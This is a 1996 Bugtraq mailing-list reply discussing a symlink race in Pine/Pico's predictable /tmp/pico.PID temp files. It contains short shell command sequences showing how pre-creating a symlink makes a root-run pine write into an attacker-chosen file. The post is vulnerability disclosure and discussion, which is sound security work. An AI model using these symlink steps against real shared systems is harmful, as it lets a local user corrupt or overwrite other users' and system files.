Bugtraq mailing list archives
Re: [linux-security] Pine security problem
From: ranaur () rdc puc-rio br (Ranaur, the Elven Warlock!)
Date: Thu, 12 Sep 1996 22:09:59 -0300
On Thu, 12 Sep 1996, Pascal A. Dupuis wrote:
I tried with my system, running Pine3.95 on Linux 2.0.18. A) I started composing a message, invoqued the alternate editor (with Linux and a french keyboard, the command is ^), ??? ). From another login name, I do : cd /tmp ln -s pico.pid hacker.tmp more hacker.tmp -> permission denied ! B) I started the other way : first, from the other login ln -s hacker.tmp pico.pid Then, start composing a message. Invoquing the alternate command resulted in the error message : "Problem creating pico temp file", and I was unable to use the alternate editor. On the Linux system, the /tmp/pico.pid file is created 600, owned by the Pine user. At first glance, this should be safe, isn't it ?
No. I run it on PINE 3.91 ... see on ... (sorry, I runned it as root ;) root@galadriel:/tmp# ln -s t pico.238 root@galadriel:/tmp# touch t root@galadriel:/tmp# chown 666 t root@galadriel:/tmp# ls -l lrwxrwxrwx 1 root root 1 Sep 12 22:00 pico.238 -> t* -rw-rw-rw- 1 root root 0 Sep 12 22:01 t* (runned pine (with ranaur) ... answering this message and ^_ to it ... ;) so ... abracadabra ... -rw-rw-rw- 1 root root 2366 Sep 12 22:06 t Well ... it's a problem ... if the evil guy is smart enough he can check the root running pine and trash a file in the system ... (the odds are few, but , let me be paranoid ;) ) Any sugestions? Ainur a Valar! Ranaur . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Ranaur, the Elven Warlock ! . . . . . . . . E-mail ranaur () rdc puc-rio br ranaur () usa net . . . . Look! . http://venus.rdc.puc-rio.br/ranaur/ . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Current thread:
- Pine security problem Liam O. Forbes (Sep 10)
- Re: [linux-security] Pine security problem Pascal A. Dupuis (Sep 12)
- Re: [linux-security] Pine security problem Ranaur, the Elven Warlock! (Sep 12)
- <Possible follow-ups>
- Re: Pine security problem Vince L. Reed (Sep 10)
- Re: [linux-security] Pine security problem Pascal A. Dupuis (Sep 12)